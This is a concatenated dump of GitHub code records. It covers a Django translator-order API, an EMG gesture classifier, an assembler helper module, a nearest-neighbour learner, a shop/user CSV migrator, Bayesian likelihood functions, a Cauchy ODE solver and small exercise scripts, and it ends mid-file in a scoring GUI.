orders_records.append(record)\r\n orders_dict[\"orders\"] = orders_records\r\n return JsonResponse(orders_dict)\r\n\r\n\r\ndef get_my_orders(request):\r\n if 'tid' not in request.POST or 'token' not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST['tid'])\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if request.POST['token'] != translator_auth.token:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n translator = Translator.objects.get(t_id=request.POST['tid'])\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n orders = translator.order_set.filter(status__in=[4, 5])\r\n # i_end_int__gte = x, i_begin_int__lte = x\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"no_orders\"})\r\n if len(orders) == 0:\r\n return JsonResponse({\"response\": \"no_orders\"})\r\n orders_dict = {}\r\n orders_records = []\r\n orders_dict[\"response\"] = \"ok\"\r\n for translators_orders in orders:\r\n order_id = translators_orders.o_id\r\n order_date_end = translators_orders.date_end\r\n order_lang = translators_orders.lang_from + '->' + translators_orders.lang_to\r\n order_direction = translators_orders.direction\r\n order_pages = translators_orders.pages\r\n order_price = translators_orders.price_to_translator\r\n order_status = translators_orders.status\r\n record = {\"id\": order_id, \"deadline\": order_date_end, \"language\": order_lang,\r\n \"direction\": order_direction, \"pageCount\": order_pages, \"price\": order_price, \"status\": order_status}\r\n orders_records.append(record)\r\n orders_dict[\"orders\"] = orders_records\r\n return JsonResponse(orders_dict)\r\n\r\n\r\ndef take_an_order(request):\r\n if \"tid\" not in request.POST or \"oid\" not in request.POST or \"token\" not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\", \"data\": \"\"})\r\n try:\r\n if TranslatorAuth.objects.get(t_id=request.POST[\"tid\"]).token != request.POST[\"token\"]:\r\n return JsonResponse({\"response\": \"error_t\", \"data\": \"\"})\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\", \"data\": \"\"})\r\n try:\r\n order = Order.objects.get(o_id=request.POST[\"oid\"])\r\n client = Client.objects.get(c_id=order.customer_id)\r\n except Order.DoesNotExist:\r\n return JsonResponse({\"response\": \"error_one\", \"data\": \"\"})\r\n except Client.DoesNotExist:\r\n return JsonResponse({\"response\": \"error_cne\", \"data\": \"\"})\r\n if order.status != \"3\":\r\n return JsonResponse({\"response\": \"error_s\", \"data\": \"\"})\r\n order.status = \"4\"\r\n order.translators.clear()\r\n order.translators.add(Translator.objects.get(t_id=request.POST[\"tid\"]))\r\n order.save()\r\n client_fcm_token = [ClientAuth.objects.get(c_id=client.c_id).fcm_token]\r\n client.order_status = \"4\"\r\n client.save()\r\n send_push_notification(\"Найден переводчик\", \"Теперь Ваш заказ в процессе перевода\", client_fcm_token)\r\n return JsonResponse({\"response\": \"tao_ok\", \"data\": \"\"})\r\n\r\n\r\ndef complete_order(request):\r\n if \"tid\" not in request.POST or \"oid\" not in request.POST or \"token\" not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\", \"data\": \"\"})\r\n try:\r\n if TranslatorAuth.objects.get(t_id=request.POST[\"tid\"]).token != request.POST[\"token\"]:\r\n return JsonResponse({\"response\": \"error_t\", \"data\": 
\"\"})\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\", \"data\": \"\"})\r\n try:\r\n order = Order.objects.get(o_id=request.POST[\"oid\"])\r\n except Order.DoesNotExist:\r\n return JsonResponse({\"response\": \"error_one\", \"data\": \"\"})\r\n order.status = \"5\"\r\n order.save()\r\n return JsonResponse({\"response\": \"finish_ok\", \"data\": \"\"})\r\n\r\n\r\ndef save_fcm_token(request):\r\n if \"tid\" not in request.POST or \"token\" not in request.POST or \"fcm_token\" not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST[\"tid\"])\r\n except Client.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if translator_auth.token != request.POST[\"token\"]:\r\n return JsonResponse({\"response\": \"denied\"})\r\n translator_auth.fcm_token = request.POST[\"fcm_token\"]\r\n translator_auth.save()\r\n return JsonResponse({\"response\": \"ok\"})\r\n\r\n\r\ndef cancel_order(request):\r\n if \"tid\" not in request.POST or \"token\" not in request.POST or \"oid\" not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST[\"tid\"])\r\n except Client.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if translator_auth.token != request.POST[\"token\"]:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n order = Order.objects.get(o_id=request.POST['oid'])\r\n except Order.DoesNotExist:\r\n return JsonResponse({\"response\": \"order_not_exists\"})\r\n trans = Translator.objects.get(t_id=request.POST[\"tid\"])\r\n order.translators.remove(trans)\r\n order.save()\r\n if order.translators.count() == 0:\r\n order.status = '9'\r\n order.save()\r\n return JsonResponse({'response': 'ca_ok'})\r\n","repo_name":"atabayev/ftss","sub_path":"translator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36799889123","text":"a, b = [3, 2, 1], [6, 9]\n\n# 两个列表元素合并成一个列表\n# map(func, *iterables)\nlis = list(map(lambda x0, x1: f'{x0}-{x1}', a, b))\nprint(lis)\n\n\n# iter(object)返回迭代器\nlis = {'na': 12, 'key': \"dyq\"}\na = iter(lis.items()) # 二元元祖迭代器\nfor i in a:\n print(i)","repo_name":"diaoyuqiang/python","sub_path":"列表合并及iter函数.py","file_name":"列表合并及iter函数.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16967777867","text":"\nimport sys\nsys.stdin = open('1526.txt')\n\n# 금민수는 4, 7로만 이루어진 수를 말함\n# N보다 작거나 같은 금민수중 가장 큰 것을 출력하는 프로그램\n\nN = int(input())\n\nwhile N >= 4: # n은 4보다 크거나 같다고 했으므로 4보다 작아질 경우 종료하게끔 설정\n cnt = 0 # cnt\n for i in str(N): # N을 문자열로 바꾼다음 순회\n if i == '4' or i == '7': # 4, 7이 있다면\n cnt += 1 # cnt 1을 해준다\n if cnt == len(str(N)): # 문자열의 길이와 cnt가 일치하면\n print(N) # N을 프린트해주고\n break # 브레이크\n else: # 다르다면\n N -= 1 # N에서 1빼준다\n","repo_name":"wdahlia/Python-Algorithm","sub_path":"KDT 실습/0809 BOJ_N/1526_가장큰금민수.py","file_name":"1526_가장큰금민수.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"10499097208","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pylab as plt\nimport os\nimport pandas as pd\nimport numpy as np\nimport scipy\nimport time\nfrom sklearn.model_selection import 
train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import cross_val_score\nimport pickle\n\n\ndef extractStatisticalfeatures(x):\n fstd=np.std(x)\n fmax=np.max(x)\n fmin=np.min(x)\n fpp=fmax-fmin\n zero_crosses = np.nonzero(np.diff(x > 0))[0]\n fzero=zero_crosses.size/len(x)\n frms = np.sqrt(np.mean(np.square(x)))\n \n return fstd, fmin, fpp, fzero, frms \n\npath = \"./EMG_data_for_gestures-master/\"\nfolders = [file for file in os.listdir(path) if not file.startswith('.')]\n\nall_data = pd.DataFrame()\n\nfor folder in folders:\n files = [file for file in os.listdir(path+folder) if not file.startswith('.')]\n print (folder, files)\n for file in files:\n current_data = pd.read_csv(path+folder+\"/\"+file,sep='\\t') \n all_data = pd.concat([all_data,current_data])\n\nall_data=all_data.dropna()\n\nwinsize=1000\nwinhop=50\n\n\nfstd=[]\nfmin=[]\nfpp=[]\nfzero=[]\nfrms=[]\nflabel=[]\n\nch1mean=[]\nch2mean=[]\nch3mean=[]\nch4mean=[]\nch5mean=[]\nch6mean=[]\nch7mean=[]\nch8mean=[]\n\nfpercent=[]\nflabel2=[]\nfor i in range(0,len(all_data),winhop):\n selmat=all_data.iloc[i:i+winsize, 1:9].to_numpy().flatten()\n \n s,mi,pp,z,r = extractStatisticalfeatures(selmat) \n fstd.append(s)\n fmin.append(mi),\n fpp.append(pp)\n fzero.append(z)\n frms.append(r)\n \n ch1mean.append(all_data.iloc[i:i+winsize,1].mean())\n ch2mean.append(all_data.iloc[i:i+winsize,2].mean())\n ch3mean.append(all_data.iloc[i:i+winsize,3].mean())\n ch4mean.append(all_data.iloc[i:i+winsize,4].mean())\n ch5mean.append(all_data.iloc[i:i+winsize,5].mean())\n ch6mean.append(all_data.iloc[i:i+winsize,6].mean())\n ch7mean.append(all_data.iloc[i:i+winsize,7].mean())\n ch8mean.append(all_data.iloc[i:i+winsize,8].mean())\n \n bincountlist=np.bincount(all_data.iloc[i:i+winsize,-1].to_numpy(dtype='int64'))\n most_frequent_class=bincountlist.argmax()\n flabel.append(most_frequent_class)\n \n percentage_most_frequent=bincountlist[most_frequent_class]/len(all_data.iloc[i:i+winsize,-1].to_numpy(dtype='int64'))\n fpercent.append(percentage_most_frequent)\n \n if percentage_most_frequent==1.0:\n most_frequent_class2=most_frequent_class\n else:\n bincountlist[most_frequent_class]= 0\n most_frequent_class2=bincountlist.argmax()\n \n flabel2.append(most_frequent_class2)\n \nrdf = pd.DataFrame(\n {'ch1mean': ch1mean,\n 'ch2mean': ch2mean,\n 'ch3mean': ch3mean,\n 'ch4mean': ch4mean,\n 'ch5mean': ch5mean,\n 'ch6mean': ch6mean,\n 'ch7mean': ch7mean,\n 'ch8mean': ch8mean,\n 'std': fstd,\n 'min': fmin,\n 'peak-to-peak':fpp,\n 'zerocross':fzero,\n 'rms':frms,\n 'label':flabel,\n 'percent':fpercent,\n '2ndlabel':flabel2\n \n})\n\nrdf = rdf[rdf.label != 0]\nrdf = rdf[rdf.label != 7]\n\n\nrdf.to_csv(\"___emg_gesture_ws\"+str(winsize)+\"_hop\"+str(winhop)+\".csv\", index = None, header=True)\n\nrdf = pd.read_csv('___emg_gesture_ws1000_hop50.csv')\n\nX=rdf.iloc[:,:-3]\ny=rdf.iloc[:,-3]\n\n#Selecting Features\nX=rdf[[\"zero8\",\"pp4\",\"zero7\",\"min4\",\"rms5\"]]\ny=rdf[\"label\"]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)\n\n# Initialize the models\nrf = RandomForestClassifier()\nada = AdaBoostClassifier()\ngbc = GradientBoostingClassifier()\ndt = DecisionTreeClassifier()\nknn = KNeighborsClassifier()\nmlp = 
MLPClassifier()\n\n# Create a list of the models\nmodels = [rf, ada, gbc, dt, knn, mlp]\n\nresults = {}\n\n# Iterate over the models and perform 5-fold cross-validation\nfor model in models:\n scores = cross_val_score(model, X_train, y_train, cv=5)\n results[model] = scores\n\naccscores=[]\nfor model in models:\n accscores.append(np.mean(results[model]))\n print(model, accscores[-1])\n\nplt.figure()\nplt.bar(range(len(accscores)), accscores, tick_label=models)\nplt.grid()\nplt.legend()\nplt.show()\n \n# Find the best performing model\nbest_model = max(results, key=lambda x: np.mean(results[x]))\nclf = best_model\nclf.fit(X_train, y_train)\n\n# Save the best model to a pickle file\nwith open(\"selectedModel.pkcls\", \"wb\") as f:\n pickle.dump(clf, f)\n\n","repo_name":"BuseBeker/EMG-Key-Sliding-Window","sub_path":"EMG-Key-Sliding-Window/Final_02_Part01.py","file_name":"Final_02_Part01.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15097907845","text":"from __future__ import absolute_import, division, print_function\n\nfrom .. import learner\nfrom .. import nn_set\nfrom .. import tools\n\n\ndefcfg = learner.Learner.defcfg._deepcopy()\ndefcfg.classname = 'learners.NNLearner'\n\nclass NNLearner(learner.Learner):\n    \"\"\"\"\"\"\n\n    defcfg = defcfg\n\n    def __init__(self, cfg, nnset=None):\n        super(NNLearner, self).__init__(cfg)\n        self.nnset = nnset if nnset is not None else nn_set.NNSet()\n\n    def _predict(self, m_signal):\n        \"\"\"Predict the effect of an order\"\"\"\n        m_v = tools.to_vector(m_signal)\n        dists, m_idx = self.nnset.nn_x(m_v, k=1)\n        s_vector = self.nnset.ys[m_idx[0]]\n        return tools.to_signal(s_vector, self.s_channels)\n\n    def _infer(self, s_signal):\n        \"\"\"Infer the motor command to obtain an effect\"\"\"\n        s_v = tools.to_vector(s_signal)\n        dists, s_idx = self.nnset.nn_y(s_v, k=1)\n        m_vector = self.nnset.xs[s_idx[0]]\n        return tools.to_signal(m_vector, self._m_channels)\n\n    def _update(self, m_signal, s_signal, uuid=None):\n        m_v = tools.to_vector(m_signal, self._m_channels)\n        s_v = tools.to_vector(s_signal, self.s_channels)\n        self.nnset.add(m_v, s_v, uuid=uuid)\n","repo_name":"benureau/learners","sub_path":"learners/algorithms/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"39807583503","text":"import sys\r\n\r\nfrom MicroHamudi.Exceptions.CompilerExceptions import *\r\n\r\n\r\ndef format_hex(hex_str, length):\r\n \"\"\"Return a hex-string with fixed length (filled with '0')\"\"\"\r\n while len(hex_str) < length:\r\n hex_str = \"0\" + hex_str\r\n return hex_str\r\n\r\n\r\ndef handle_int(int_imm):\r\n \"\"\"Format the given immediate as int and return its string representation\"\"\"\r\n # if bigger than 2^15 - 1 or smaller than -2^15 (16-Bit signed int limits) raise an exception\r\n if int_imm > (2 ** 15 - 1) or int_imm < -(2 ** 15):\r\n raise WrongImmediateException(\"\\nThe number must be representable with signed 16-Bit.\"\r\n \" Given number: '\" + str(int_imm) + \"' cannot be represented\"\r\n \" as signed 16-Bit Integer\")\r\n else:\r\n # flip the number if negative due to its hex representation (ffff for -1)\r\n if int_imm < 0:\r\n int_imm = 2 ** 16 + int_imm\r\n\r\n # return the string representation of the hex-number without '0x'\r\n return str(hex(int_imm))[2:]\r\n\r\n\r\ndef handle_float(float_imm):\r\n \"\"\"Format the given immediate as 
float and return it's string representation\"\"\"\r\n # try to round the number and message the wrong format\r\n print(\"Floating-point numbers are not supported! Rounding the number to an int...\")\r\n float_imm = int(float_imm)\r\n return handle_int(float_imm)\r\n\r\n\r\ndef handle_string(str_imm):\r\n \"\"\"Take the immediate as string and return it's formatted string representation\"\"\"\r\n try:\r\n if '0x' in str_imm:\r\n # hex-str\r\n str_imm = str_imm[2:]\r\n str_imm = format_hex(str_imm, 4)\r\n\r\n int_imm = int(str_imm, 16)\r\n\r\n if str_imm[0].upper() in \"89ABCDEF\":\r\n int_imm -= 2 ** 16\r\n\r\n str_imm = handle_int(int_imm)\r\n else:\r\n # dec-str\r\n str_imm = handle_int(int(str_imm))\r\n\r\n return str_imm\r\n except ValueError:\r\n print(\"ValueError: Wrong immediate-format: for hex please use '0x'!\")\r\n sys.exit(-1)\r\n\r\n\r\ndef handle_registry(reg):\r\n \"\"\"Format the given registry as string (or make it a string) and return formatted registry string as hex\"\"\"\r\n try:\r\n # Check what instance the given registry is and format it accordingly\r\n if isinstance(reg, int):\r\n if reg < 0:\r\n raise ValueError\r\n reg = str(hex(reg))[2:]\r\n elif isinstance(reg, float):\r\n if int(reg) < 0:\r\n raise ValueError\r\n reg = str(hex(int(reg)))[2:]\r\n elif isinstance(reg, str):\r\n if '0x' in reg or 'x' in reg:\r\n reg = reg[2:]\r\n else:\r\n reg = str(hex(int(reg)))[2:]\r\n\r\n if len(reg) > 1:\r\n raise WrongRegistryIndexException(\"\\nNo Registry with index '\"\r\n + str(hex(int(reg, 16))).upper().replace('X', 'x')\r\n + \"' is available!\")\r\n else:\r\n return reg\r\n\r\n except ValueError:\r\n print(\"ValueError: Non-existing index '\" + str(reg).upper() + \"'! If hex, please use 0x.\")\r\n sys.exit(-1)\r\n\r\n\r\ndef handle_immediate(imm):\r\n \"\"\"Format the given immediate depending on it's data type and return it as formatted string\"\"\"\r\n # Handle the immediate\r\n if isinstance(imm, int):\r\n imm = handle_int(imm)\r\n elif isinstance(imm, float):\r\n imm = handle_float(imm)\r\n elif isinstance(imm, str):\r\n imm = handle_string(imm)\r\n\r\n # Return the formatted immediate\r\n return imm\r\n\r\n\r\ndef format_classname(classname, instr_hex, str_to_write=''):\r\n \"\"\"Extract all data needed from hex-instructions to format the ASM-instruction\"\"\"\r\n if '_' in classname:\r\n classname = classname.replace(\"_\", \" \")\r\n if 'RA' in classname:\r\n # Extract from hex-instruction 0xXXAB A-registry 'A'\r\n classname = classname.replace(\"RA\", \"RA:\" + instr_hex[4])\r\n if 'RB' in classname:\r\n # Extract from hex-instruction 0xXXAB B-registry 'B'\r\n classname = classname.replace('RB', \"RB:\" + instr_hex[5])\r\n if 'imm' in classname:\r\n # Extract from hex-instruction 0xXXAB CCCC immediate 'CCCC'\r\n classname = classname.replace('imm', str(int(instr_hex[-4:], 16)))\r\n if 'EBP p' in classname:\r\n classname = classname.replace('EBP p ', '[EBP + ').replace(classname[-4:], classname[-4:] + \"]\")\r\n if 'str' in classname:\r\n classname = classname.replace('str', \"'\" + str_to_write + \"'\").replace('\\n', '\\\\n')\r\n\r\n return classname\r\n\r\n\r\ndef calculate_indentation(indent_size, instr_counter):\r\n \"\"\"Calculates the indentation needed and returns it as string\"\"\"\r\n return \" \" * (len(str(indent_size)) - len(str(instr_counter)))\r\n\r\n\r\ndef write(str_input, path, filename):\r\n \"\"\"Write the input into the @filename\"\"\"\r\n with open(path + filename, \"w\") as file:\r\n file.write(str_input)\r\n\r\n\r\ndef 
format_hexstring_instr(long_str, newlines_num=6):\r\n \"\"\"Format a long string into @newlines_num lines (default 6 lines) and return it\"\"\"\r\n instr_list = split_with_space(long_str)\r\n\r\n output_str = \"\"\r\n instr_num = len(instr_list)\r\n instr_per_line = instr_num // newlines_num\r\n\r\n for num, value in enumerate(instr_list):\r\n if num < 2:\r\n output_str += value + \" \"\r\n else:\r\n current_instr = num - 2\r\n if current_instr % instr_per_line == 0:\r\n output_str += \"\\n\" + value + \" \"\r\n else:\r\n output_str += value + \" \"\r\n\r\n return output_str\r\n\r\n\r\ndef split_with_space(input_str):\r\n \"\"\"Split @input_str with space and format 'v2.0 raw\\n'\"\"\"\r\n output_str = input_str.split(\" \")\r\n\r\n for num, element in enumerate(output_str):\r\n if 'raw\\n' in element:\r\n n_elements = element.split(\"\\n\")\r\n del output_str[num]\r\n for key, obj in enumerate(n_elements):\r\n output_str.insert(num + key, obj)\r\n\r\n return output_str\r\n\r\n\r\ndef convert_chars_hex(char):\r\n \"\"\"Convert char to ASCII-hex-value of it without '0x' \"\"\"\r\n hex_string = str(hex(ord(char))[2:])\r\n while len(hex_string) < 4:\r\n hex_string = \"0\" + hex_string\r\n return hex_string\r\n","repo_name":"hamnaanaa/H-Language","sub_path":"PythonCompiler/Rechner/MicroHamudi/Functions/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27574383308","text":"import time \r\nimport csv \r\n\r\ndef time_convert(sec):\r\n mins = sec // 60\r\n sec = sec % 60\r\n hours = mins // 60\r\n mins = mins % 60\r\n duration = \"{0}:{1}:{2}\".format(int(hours), int(mins), sec)\r\n print(\"Time Lapsed = \" + duration)\r\n return duration # return the formatted duration instead of None\r\n\r\ninput(\"Press Enter to start\")\r\nstart_time = time.time()\r\n\r\ninput(\"Press Enter to stop\")\r\nend_time = time.time()\r\ntime_lapsed = end_time - start_time\r\nduration = time_convert(time_lapsed)\r\n\r\nheader = ['start_time ', 'end_time ', 'duration ']\r\n\r\ndata = dict(zip(('start_time ', 'end_time ', 'duration '),(start_time, end_time, time_lapsed)))\r\nwith open('data.csv', 'a') as f:\r\n writer = csv.DictWriter(f, fieldnames= header)\r\n\r\n writer.writerow(data)\r\n\r\n\r\n","repo_name":"limzishen/StudyApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6604326914","text":"import os\r\nfrom time import sleep\r\nimport app.constants.constants as const\r\nfrom app.entities.ShopEntity import ShopEntity\r\nfrom app.repository.DBManager import DBManager\r\nfrom app.repository.ShopRepository import ShopRepository\r\nfrom app.repository.UserRepository import UserRepository\r\nimport app.utils.LogHandler as logging\r\nimport csv\r\n\r\n\r\nclass FileManager(object):\r\n\r\n def __init__(self, dbManager: DBManager):\r\n self.logger = logging.getLogger(self.__class__.__name__)\r\n self.dbManager = dbManager\r\n\r\n def execute(self):\r\n self.dbManager.connect()\r\n\r\n userRepository = UserRepository(self.dbManager)\r\n shopRepository = ShopRepository(self.dbManager)\r\n\r\n users_to_insert, users_to_relation = self.readUsersCSV()\r\n shops_to_insert, shops_to_relation = self.readShopsCSV()\r\n \r\n usersInserted = userRepository.insert_many(users_to_insert, users_to_relation, 
shops_to_relation)\r\n shopsInserted = shopRepository.insert_many(shops_to_insert)\r\n\r\n if usersInserted and shopsInserted:\r\n shopRepository.insert_shops_users(users_to_relation)\r\n shopRepository.insert_shops_categories(shops_to_relation)\r\n\r\n shopRepository.insert_shops_root_directory(shops_to_insert)\r\n\r\n \r\n\r\n self.dbManager.close()\r\n\r\n def readShopsCSV(self):\r\n shops_to_insert: list[ShopEntity] = []\r\n shops_to_relation: list[ShopEntity] = []\r\n try:\r\n self.logger.info('Looking for shops file...')\r\n\r\n filePath = f'{const.ROOT_PATH}/app/input/shops.csv'\r\n \r\n resultDictShops = []\r\n shop_ids = []\r\n resultDictRelation = []\r\n\r\n with open(filePath) as f:\r\n for row in csv.DictReader(f, skipinitialspace=True, delimiter=';'):\r\n newDict = {}\r\n for k, v in row.items():\r\n newDict[k] = str(v)\r\n\r\n resultDictRelation.append(newDict)\r\n\r\n # not append duplicate mrkl_shop_id\r\n if const.SHOP_ID in newDict and newDict[const.SHOP_ID] not in shop_ids:\r\n resultDictShops.append(newDict)\r\n if const.SHOP_ID in newDict:\r\n shop_ids.append(newDict[const.SHOP_ID])\r\n\r\n for result in resultDictShops:\r\n newShop = ShopEntity(result)\r\n shops_to_insert.append(newShop)\r\n \r\n for result in resultDictRelation:\r\n newShop = ShopEntity(result)\r\n shops_to_relation.append(newShop)\r\n\r\n sleep(1)\r\n if os.path.exists(filePath):\r\n os.remove(filePath)\r\n return shops_to_insert, shops_to_relation\r\n except Exception as e:\r\n self.logger.warning('There is not shops file to read')\r\n print(e)\r\n return shops_to_insert, shops_to_relation\r\n \r\n def readUsersCSV(self):\r\n users_to_insert: list[ShopEntity] = []\r\n users_to_relation: list[ShopEntity] = []\r\n try:\r\n self.logger.info('Looking for users file...')\r\n\r\n filePath = f'{const.ROOT_PATH}/app/input/users.csv'\r\n \r\n resultDictUsers = []\r\n resultDictRelation = []\r\n user_emails = []\r\n\r\n with open(filePath) as f:\r\n for row in csv.DictReader(f, skipinitialspace=True, delimiter=';'):\r\n newDict = {}\r\n for k, v in row.items():\r\n newDict[k] = str(v)\r\n\r\n resultDictRelation.append(newDict)\r\n\r\n # not append duplicate user_codes\r\n if const.USER_EMAIL in newDict and newDict[const.USER_EMAIL] not in user_emails:\r\n resultDictUsers.append(newDict)\r\n if const.USER_EMAIL in newDict:\r\n user_emails.append(newDict[const.USER_EMAIL])\r\n\r\n for result in resultDictUsers:\r\n newUser = ShopEntity(result)\r\n users_to_insert.append(newUser)\r\n\r\n for result in resultDictRelation:\r\n newShop = ShopEntity(result)\r\n users_to_relation.append(newShop)\r\n\r\n sleep(1)\r\n if os.path.exists(filePath):\r\n os.remove(filePath)\r\n return users_to_insert, users_to_relation\r\n except Exception as e:\r\n self.logger.warning('There is not users file to read')\r\n print(e)\r\n return users_to_insert, users_to_relation\r\n","repo_name":"DiegoSullon/migrator-demon","sub_path":"app/manager/FileManager.py","file_name":"FileManager.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17712178961","text":"'''\nContains examples of standard likelihood functions for usage in the package.\n'''\nimport numpy as np\n\ndef isotropic_gaussian(q):\n '''\n An isotropic Gaussian likelihood function.\n\n Parameters\n ----------\n q : numpy array\n Position parameter\n\n\n Returns\n -------\n r : dictionary\n returns the log likelihood under the ``llh`` key, and the gradient under the ``grad`` 
key.\n    '''\n\n    llh = -np.sum(q * q) / 2\n    grad = -q\n\n    return {\"llh\": llh, \"grad\": grad}\n\n\ndef blr(q, data, t, idxs=None, alpha=100):\n    '''\n    Bayesian Logistic Regression with a Gaussian prior.\n\n    Parameters\n    ----------\n    q : numpy array\n        Position parameter\n    data : numpy array\n        A (N,d) array, where the d datapoints have dimensionality N.\n    t : numpy array\n        A (1,d) binary array of indicator values\n    idxs : list or iterable, optional\n        A list of indexes to use in the BLR calculation\n    alpha : float, optional\n        The variance of the Gaussian prior, default 100.\n\n\n    Returns\n    -------\n    r : dictionary\n        returns the log likelihood under the ``llh`` key, the gradient under the ``grad`` key and the gradients for each data point are given in ``grad_data``.\n    '''\n\n    Ndata = data.shape[1]\n\n    if idxs is None:\n        idxs = np.arange(Ndata)\n\n    X = data[:, idxs].T\n    t = t[:, idxs].T\n\n    # Prior\n    Vprior = -0.5 * np.sum(q ** 2) / alpha\n    Fprior = -q / alpha\n\n    # Posterior\n    tv = np.dot(X, q)\n    exptv = np.exp(-tv)\n\n    VV = tv * t - np.log(1 + exptv) - tv\n\n    #V = np.sum(tv * t) - np.sum(np.log(1 + exptv)) - np.sum(tv)\n    F = X * (t - 1.0 / (1.0 + exptv))\n\n    TotalV = (np.sum(VV) + Vprior)\n\n    TotalF = (Ndata * np.mean(F, 0, keepdims=True) + Fprior.T).T\n\n    return {\"llh\": TotalV, \"llh_data\": VV, \"grad\": TotalF, \"grad_data\": F.T}\n","repo_name":"c-matthews/racecar","sub_path":"src/racecar/llh.py","file_name":"llh.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"34325659310","text":"import math\n\n\ndef get_cauchy_equation(task_number):\n    if task_number == 1:\n        return lambda x, y: x ** 2 + y, lambda c, x: c * math.e ** x - x ** 2 - 2 * x - 2 \\\n            , lambda x, y: (y + x ** 2 + 2 * x + 2) / (math.e ** x)\n    if task_number == 2:\n        return lambda x, y: y + math.cos(x), lambda x, c: math.sin(x) * 0.5 - math.sin(x) * 0.5 + c * math.e ** x, \\\n               lambda x, y: (-math.sin(x) * 0.5 + math.sin(x) * 0.5 + y) / (math.e ** x)\n    if task_number == 3:\n        return lambda x, y: (2 * y) + x ** 2, lambda x, c: c * math.e ** (2 * x) - (x ** 2) * 0.5 - x / 2 - 1 / 4, \\\n               lambda x, y: (y + (x ** 2) * 0.5 + x / 2 + 1 / 4) / (math.e ** (2 * x))\n\n\ndef enter_value(text):\n    while True:\n        try:\n            x = float(input(f\"Enter {text}: \"))\n            return x\n        except ValueError:\n            print(\"Invalid input\")\n\n\ndef get_data():\n    while True:\n        try:\n            print(\"1 y' = x^2 + y\\n2 y' = y + cos(x)\\n3 y' = (2 * y) + x^2\")\n            task_number = int(input(\"Choose a Cauchy problem: \"))\n            if 1 <= task_number <= 3:\n                equation1, equation2, equation3 = get_cauchy_equation(task_number)\n                break\n            else:\n                print(\"No such problem\")\n\n        except ValueError:\n            print(\"Invalid input\")\n    x0 = enter_value(\"x0\")\n    y0 = enter_value(\"y0\")\n    while True:\n        try:\n            borders = tuple(map(float, input(\"Enter the interval bounds a and b: \").strip().split()))\n\n            if borders[0] < borders[1]:\n                break\n            else:\n                print(\"The left bound must be less than the right one\")\n        except (ValueError, IndexError):\n            print(\"Invalid input\")\n    h = -1\n    while h <= 0:\n        h = enter_value(\"step h\")\n        if h <= 0:\n            print(\"h must be > 0\")\n    a = -1\n    while a <= 0:\n        a = enter_value(\"accuracy, e.g. 0.01\")\n        if a <= 0:\n            print(\"a must be > 0\")\n\n    return {\"a\": borders[0], \"b\": borders[1], \"x0\": x0, \"y0\": y0, \"h\": h, \"accuracy\": a, \"equation1\": equation1,\n            \"equation2\": equation2, \"equation3\": 
equation3}\n","repo_name":"wizarsi/calculative-math","sub_path":"calculative-math-lab6/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21899858070","text":"#!/usr/bin/python3\n\"\"\"\nscoregui.py handle score.py3 configuration.\n\"\"\"\n\nimport configparser\nimport glob\nfrom tkinter import *\nfrom tkinter import ttk\nimport os\n\nconfig = configparser.ConfigParser()\nconfig.read('score.ini')\n\n# directory of problems to score\nproblemFiles = config['Paths']['ProblemFiles']\n# directory of reference answers\nanswerFiles = config['Paths']['AnswerFiles']\n# filename of HTML output\nHTML = config['Paths']['HTMLOutput']\ncss = config['Paths']['cssOutput']\nRefresh = config['HTML']['Refresh']\n# Elegance bonus multipler\nElegance = config.getint('Bonus','Elegance',fallback=1)\n# Read in Bonus Points\nBPList = 